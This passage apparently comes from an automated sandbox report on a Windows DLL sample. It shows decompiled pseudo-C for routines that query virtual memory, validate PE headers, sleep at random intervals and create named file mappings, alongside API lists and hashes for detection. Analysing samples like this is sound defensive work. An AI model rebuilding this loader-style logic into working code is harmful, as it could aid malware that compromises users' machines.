					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6d5041f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6d504240 = 1;
										__eflags =  *0x6d504240;
										if( *0x6d504240 != 0) {
											goto L60;
										}
										_t84 =  *0x6d5041f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6d504240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6d5041f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6d504200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6d5041fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6d504200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d504200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6d504240 = 1;
							__eflags =  *0x6d504240;
							if( *0x6d504240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6d504200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6d504200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6d504240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6d504200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6d5041f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6d504200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d504200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































    0x6d50248f
    0x6d502492
    0x6d502498
    0x6d5024b6
    0x00000000
    0x6d5024b6
    0x6d5024a0
    0x6d5024a9
    0x6d5024af
    0x6d5024be
    0x6d5024c1
    0x6d5024c4
    0x6d5024ce
    0x6d5024ce
    0x6d5024d0
    0x6d5024d3
    0x6d5024d5
    0x6d5024d5
    0x6d5024d7
    0x6d5024da
    0x00000000
    0x00000000
    0x6d5024dc
    0x6d5024de
    0x6d502544
    0x6d502544
    0x6d5026a2
    0x00000000
    0x6d5026a2
    0x6d5024e0
    0x6d5024e0
    0x6d5024e4
    0x6d5024e6
    0x6d5024e6
    0x6d5024e6
    0x6d5024e6
    0x6d5024e9
    0x6d5024ea
    0x6d5024ed
    0x6d5024ed
    0x6d5024f1
    0x6d5024f5
    0x6d502503
    0x6d502503
    0x6d50250b
    0x6d502511
    0x6d502513
    0x6d502515
    0x6d502525
    0x6d502532
    0x6d502536
    0x6d50253b
    0x6d50253d
    0x6d5025bb
    0x6d5025bb
    0x6d50253f
    0x6d50253f
    0x6d50253f
    0x6d5025bd
    0x6d5025bf
    0x6d5026a0
    0x6d5026a0
    0x00000000
    0x6d5025c5
    0x6d5025c5
    0x6d5025cc
    0x00000000
    0x00000000
    0x6d5025d2
    0x6d5025d6
    0x6d502632
    0x6d502634
    0x6d50263c
    0x6d50263e
    0x6d502640
    0x00000000
    0x00000000
    0x6d502642
    0x6d502648
    0x6d50264a
    0x6d50264c
    0x6d502661
    0x6d502661
    0x6d502663
    0x6d502692
    0x6d502699
    0x00000000
    0x6d502699
    0x6d502667
    0x6d502668
    0x6d50266a
    0x6d50266c
    0x6d50266c
    0x6d50266e
    0x6d502670
    0x6d502672
    0x6d502686
    0x6d502686
    0x6d502689
    0x6d50268b
    0x6d50268b
    0x6d50268c
    0x6d50268c
    0x00000000
    0x6d502674
    0x6d502674
    0x6d502674
    0x6d50267d
    0x6d50267e
    0x6d502680
    0x6d502682
    0x6d502682
    0x00000000
    0x6d502674
    0x6d502672
    0x6d50264e
    0x6d502655
    0x6d502655
    0x6d502657
    0x00000000
    0x00000000
    0x6d502659
    0x6d50265a
    0x6d50265d
    0x6d50265f
    0x00000000
    0x00000000
    0x00000000
    0x6d50265f
    0x00000000
    0x6d502655
    0x6d5025d8
    0x6d5025db
    0x6d5025e0
    0x00000000
    0x00000000
    0x6d5025e9
    0x6d5025eb
    0x6d5025f1
    0x00000000
    0x00000000
    0x6d5025f7
    0x6d5025fd
    0x00000000
    0x00000000
    0x6d502603
    0x6d502605
    0x6d50260e
    0x6d502612
    0x00000000
    0x00000000
    0x6d502618
    0x6d50261b
    0x6d50261d
    0x00000000
    0x00000000
    0x6d502624
    0x6d502626
    0x00000000
    0x00000000
    0x6d502628
    0x6d50262c
    0x00000000
    0x00000000
    0x00000000
    0x6d50262c
    0x00000000
    0x00000000
    0x00000000
    0x6d502517
    0x6d502517
    0x6d502517
    0x6d50251e
    0x00000000
    0x00000000
    0x6d502520
    0x6d502521
    0x6d502523
    0x00000000
    0x00000000
    0x00000000
    0x6d502523
    0x6d50254b
    0x6d50254d
    0x00000000
    0x00000000
    0x6d50255d
    0x6d50255f
    0x6d502561
    0x00000000
    0x00000000
    0x6d502567
    0x6d50256e
    0x6d50259a
    0x6d50259a
    0x6d50259c
    0x6d50259e
    0x6d5025b2
    0x6d5025b4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6d5025a0
    0x6d5025a0
    0x6d5025a0
    0x6d5025a9
    0x6d5025aa
    0x6d5025ac
    0x6d5025ae
    0x6d5025ae
    0x00000000
    0x6d5025a0
    0x6d502570
    0x6d502573
    0x6d502575
    0x6d502587
    0x6d502587
    0x6d50258a
    0x6d50258c
    0x6d50258c
    0x6d50258d
    0x6d50258d
    0x6d502593
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6d502577
    0x6d502577
    0x6d502577
    0x6d50257e
    0x00000000
    0x00000000
    0x6d502580
    0x6d502580
    0x6d502581
    0x00000000
    0x00000000
    0x00000000
    0x6d502581
    0x6d502583
    0x6d502585
    0x6d502598
    0x00000000
    0x00000000
    0x00000000
    0x6d502598
    0x00000000
    0x6d502585
    0x6d5024f7
    0x6d5024fa
    0x6d5024fd
    0x00000000
    0x00000000
    0x6d5024ff
    0x6d502501
    0x00000000
    0x00000000
    0x00000000
    0x6d502501
    0x6d5024c6
    0x6d5024c8
    0x00000000
    0x00000000
    0x00000000
    0x00000000

    APIs
    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6D502536
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: MemoryQueryVirtual
    • String ID: @BPm$@BPm$@BPm
    • API String ID: 2850889275-3677909773
    • Opcode ID: cbed2fd852487a29f10cfd2b393f1944733b3a9ad1c0e1aa1ff911b1823990be
    • Instruction ID: 8f8d27e2bf6710e8673cee77fdf6f32c98b434d462c3da90cf8dc5b8bc2dfff8
    • Opcode Fuzzy Hash: cbed2fd852487a29f10cfd2b393f1944733b3a9ad1c0e1aa1ff911b1823990be
    • Instruction Fuzzy Hash: 2061C9307046039FDB3DCE28D4A076973B5FB9A318F258869D926CBE90EB31D842CA54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D533369, Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 339COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
    • String ID: )
    • API String ID: 1186856153-2427484129
    • Opcode ID: 95b9c0c6bca592ac2cc2ce73661b1f262897f743e159b3a289398929614c8b63
    • Instruction ID: 0a46b694307bdde9d70251d1ec3da140f7585d3de15aa9ade43b9ee7ea2fd84f
    • Opcode Fuzzy Hash: 95b9c0c6bca592ac2cc2ce73661b1f262897f743e159b3a289398929614c8b63
    • Instruction Fuzzy Hash: 2FC16271914329AFDF0DCFA8D894EEE7BB4EB45304F02445AE215A7A90FB74AA44CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D534634, Relevance: 19.8, APIs: 13, Instructions: 301COMMON
    Download Yara Rule
    APIs
    • DName::operator+.LIBCMT ref: 6D53469F
    • DName::operator+.LIBCMT ref: 6D5347D5
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::operator+.LIBCMT ref: 6D534821
    • DName::operator+.LIBCMT ref: 6D534830
    • DName::operator+.LIBCMT ref: 6D53478B
      • Part of subcall function 6D535D7E: DName::operator=.LIBVCRUNTIME ref: 6D535E0D
    • DName::operator+.LIBCMT ref: 6D53495D
    • DName::operator=.LIBVCRUNTIME ref: 6D53499D
    • DName::DName.LIBVCRUNTIME ref: 6D5349B5
    • DName::operator+.LIBCMT ref: 6D5349C4
    • DName::operator+.LIBCMT ref: 6D5349D0
      • Part of subcall function 6D535D7E: Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
    • String ID:
    • API String ID: 1026175760-0
    • Opcode ID: b50c6b22b40f99e4cb8c62ad6b4adbc10181859d390de2fe726db57e0c74b7aa
    • Instruction ID: fbed14f6f2f0e4c33fc141a08a53d55c2028dd7eeda2cc458f26bb3f06c34589
    • Opcode Fuzzy Hash: b50c6b22b40f99e4cb8c62ad6b4adbc10181859d390de2fe726db57e0c74b7aa
    • Instruction Fuzzy Hash: B5C182719043259FDF18CFA8D854BEEBBF4AB4A304F02485EE149A7A80FB759A44CF50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54C9FC, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
    Download Yara Rule
    APIs
    • ___free_lconv_mon.LIBCMT ref: 6D54CA40
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D295
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2A7
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2B9
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2CB
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2DD
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2EF
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D301
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D313
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D325
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D337
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D349
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D35B
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D36D
    • _free.LIBCMT ref: 6D54CA35
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54CA57
    • _free.LIBCMT ref: 6D54CA6C
    • _free.LIBCMT ref: 6D54CA77
    • _free.LIBCMT ref: 6D54CA99
    • _free.LIBCMT ref: 6D54CAAC
    • _free.LIBCMT ref: 6D54CABA
    • _free.LIBCMT ref: 6D54CAC5
    • _free.LIBCMT ref: 6D54CAFD
    • _free.LIBCMT ref: 6D54CB04
    • _free.LIBCMT ref: 6D54CB21
    • _free.LIBCMT ref: 6D54CB39
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: 8039dcae9693818dd6c828f4c140f81013b177681e622510f3e7a09b8f8e7157
    • Instruction ID: 21733c97084e518ad1d6756651efea1ee20c4a6a157641ffac36630447c3304e
    • Opcode Fuzzy Hash: 8039dcae9693818dd6c828f4c140f81013b177681e622510f3e7a09b8f8e7157
    • Instruction Fuzzy Hash: C13173316083429FEB299B79D844B7673E9EF80314F11C829E16AD7960DF30EE54DB12
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52EEBB, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMON
    Download Yara Rule
    APIs
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6D52EFB6
    • type_info::operator==.LIBVCRUNTIME ref: 6D52EFDD
    • ___TypeMatch.LIBVCRUNTIME ref: 6D52F0E9
    • CatchIt.LIBVCRUNTIME ref: 6D52F13E
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6D52F1C4
    • _UnwindNestedFrames.LIBCMT ref: 6D52F24B
    • CallUnexpected.LIBVCRUNTIME ref: 6D52F266
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 4234981820-393685449
    • Opcode ID: f003bcf2b9f4bbc4589dc17fa03a8a48823bed9022b69609dc640a5abcbdd98c
    • Instruction ID: 55562c284af35b0015f2ab6a8fbda90b183cf6e7820b804b356f5a47f8800f2f
    • Opcode Fuzzy Hash: f003bcf2b9f4bbc4589dc17fa03a8a48823bed9022b69609dc640a5abcbdd98c
    • Instruction Fuzzy Hash: 7EC1D031C0420AEFCF0DCFA6E8819AEBBB5BF44314F51455AE811ABA81D731DA59CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D535126, Relevance: 15.3, APIs: 10, Instructions: 253COMMON
    Download Yara Rule
    APIs
    • DName::operator+.LIBCMT ref: 6D5351F2
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5351FD
    • DName::DName.LIBVCRUNTIME ref: 6D53520E
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352B3
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352D0
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352ED
    • DName::operator+.LIBCMT ref: 6D535302
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D535325
    • swprintf.LIBCMT ref: 6D535396
    • DName::operator+.LIBCMT ref: 6D5353ED
      • Part of subcall function 6D53327D: DName::DName.LIBVCRUNTIME ref: 6D5332A1
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
    • String ID:
    • API String ID: 3689813335-0
    • Opcode ID: 1d2282f7a806f64287548f30fa6f9cdcc2452110c02c403de21b20ce656e0d10
    • Instruction ID: 2696ec891d1958cc526c276b4bf5b37881bf817fcf48c6143c4ee3d5e2e1aac9
    • Opcode Fuzzy Hash: 1d2282f7a806f64287548f30fa6f9cdcc2452110c02c403de21b20ce656e0d10
    • Instruction Fuzzy Hash: D781F572D5432A9AEF0DCBA4C845BFE7778AF46305F53541AD210A3C80FB789A04CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5017A7, Relevance: 15.1, APIs: 10, Instructions: 103threadsleepsynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 80%
    			E6D5017A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t27;
				long _t31;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6D50146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_v56 = E6D5015A3(0, _t54);
					Sleep(_t54 << 5);
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6D501C12(_t45);
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6D501CA4(E6D5016EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6D501D7C(_t45,  &_v48) != 0) {
					 *0x6d5041b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t50 =  *_t57(_t44, 0, 0);
				if(_t50 == 0) {
					L9:
					 *0x6d5041b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6D501C8F(_t50 + _t15);
				 *0x6d5041b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50);
					E6D50136A(_t44);
					goto L11;
				}
			}




















    0x6d5017b3
    0x6d5017bc
    0x6d5017c0
    0x6d5018c8
    0x6d5018ce
    0x00000000
    0x00000000
    0x00000000
    0x6d5017c6
    0x6d5017c6
    0x6d5017cb
    0x6d5017d1
    0x6d5017e0
    0x6d5017e1
    0x6d5017e4
    0x6d5017f0
    0x6d5017f4
    0x6d5017fa
    0x6d5017fe
    0x6d501805
    0x00000000
    0x00000000
    0x6d50180b
    0x6d501812
    0x6d501816
    0x6d5018b9
    0x6d5018b9
    0x6d5018c0
    0x6d5018c2
    0x6d5018c2
    0x00000000
    0x6d5018c0
    0x6d50181f
    0x6d501872
    0x6d501872
    0x6d501883
    0x6d501887
    0x6d5018b5
    0x6d501889
    0x6d50188c
    0x6d501894
    0x6d501898
    0x6d5018a0
    0x6d5018a0
    0x6d5018a7
    0x6d5018a7
    0x00000000
    0x6d501887
    0x6d50182d
    0x6d50186c
    0x00000000
    0x6d50186c
    0x6d50182f
    0x6d501833
    0x6d50183e
    0x6d501842
    0x6d501864
    0x6d501864
    0x00000000
    0x6d501864
    0x6d501844
    0x6d501849
    0x6d501850
    0x6d501855
    0x00000000
    0x6d501857
    0x6d50185a
    0x6d50185d
    0x00000000
    0x6d50185d

    APIs
      • Part of subcall function 6D50146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D5017B8,73B763F0,00000000), ref: 6D50147B
      • Part of subcall function 6D50146C: GetVersion.KERNEL32 ref: 6D50148A
      • Part of subcall function 6D50146C: GetCurrentProcessId.KERNEL32 ref: 6D501499
      • Part of subcall function 6D50146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D5014B2
    • GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 6D5017CB
    • SwitchToThread.KERNEL32 ref: 6D5017D1
      • Part of subcall function 6D5015A3: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6D5015F9
      • Part of subcall function 6D5015A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6D5017EC), ref: 6D50168B
      • Part of subcall function 6D5015A3: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000), ref: 6D5016A6
    • Sleep.KERNEL32(00000000,00000000), ref: 6D5017F4
    • GetLongPathNameW.KERNEL32 ref: 6D50183C
    • GetLongPathNameW.KERNEL32 ref: 6D50185A
    • WaitForSingleObject.KERNEL32(00000000,000000FF,6D5016EC,?,00000000), ref: 6D50188C
    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6D5018A0
    • CloseHandle.KERNEL32(00000000), ref: 6D5018A7
    • GetLastError.KERNEL32(6D5016EC,?,00000000), ref: 6D5018AF
    • GetLastError.KERNEL32 ref: 6D5018C2
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
    • String ID:
    • API String ID: 2280543912-0
    • Opcode ID: 878600212151b24b2e937eaf7151ffc2e9081d882827c2898f56ca57d94135e4
    • Instruction ID: a90ba468fa551f13a5fb4f3c1d8de73baff73fd19cb43b3aefe5f46c5ff6a1ca
    • Opcode Fuzzy Hash: 878600212151b24b2e937eaf7151ffc2e9081d882827c2898f56ca57d94135e4
    • Instruction Fuzzy Hash: 5E3181718097129BEB14DF658884E6B77FCFFC6759B164E2AF564D2940E730CA008BA3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D543327, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 6D54333D
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D543349
    • _free.LIBCMT ref: 6D543354
    • _free.LIBCMT ref: 6D54335F
    • _free.LIBCMT ref: 6D54336A
    • _free.LIBCMT ref: 6D543375
    • _free.LIBCMT ref: 6D543380
    • _free.LIBCMT ref: 6D54338B
    • _free.LIBCMT ref: 6D543396
    • _free.LIBCMT ref: 6D5433A4
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 0159f860ccebc049c4f6d727cdc37a844c96bea9f15a99d3fdaae25fade470ac
    • Instruction ID: a2543751cda50278a5c475b45aa46b3a1f3ea1b69e52c9f9049b6b34d34669f3
    • Opcode Fuzzy Hash: 0159f860ccebc049c4f6d727cdc37a844c96bea9f15a99d3fdaae25fade470ac
    • Instruction Fuzzy Hash: 8D21B676908108BFCB45DF94C884DEE7BB9AF48344F0185A6E6169B530EB71EB44DB81
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D542126, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: __aulldvrm
    • String ID: :$f$f$f$p$p$p
    • API String ID: 1302938615-1434680307
    • Opcode ID: b5438043afe30b06477190cf8c945b05878d2e90a1c38a98da154d21764c978b
    • Instruction ID: 42a05122d70d77dc55051bbde9d8cb4f87b0f4742a657b8a175e59242a351e66
    • Opcode Fuzzy Hash: b5438043afe30b06477190cf8c945b05878d2e90a1c38a98da154d21764c978b
    • Instruction Fuzzy Hash: FC026075A042298AEB38CFA5C8546DDB7B6FF42B14FA0C655D428FBA84D7708D84CB13
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D501979, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
    Download Yara Rule
    C-Code - Quality: 68%
    			E6D501979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6D502210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6d5041d0;
				_push(_t15 + 0x6d50505e);
				_push(_t15 + 0x6d505054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6D50220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x6d5041c0, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
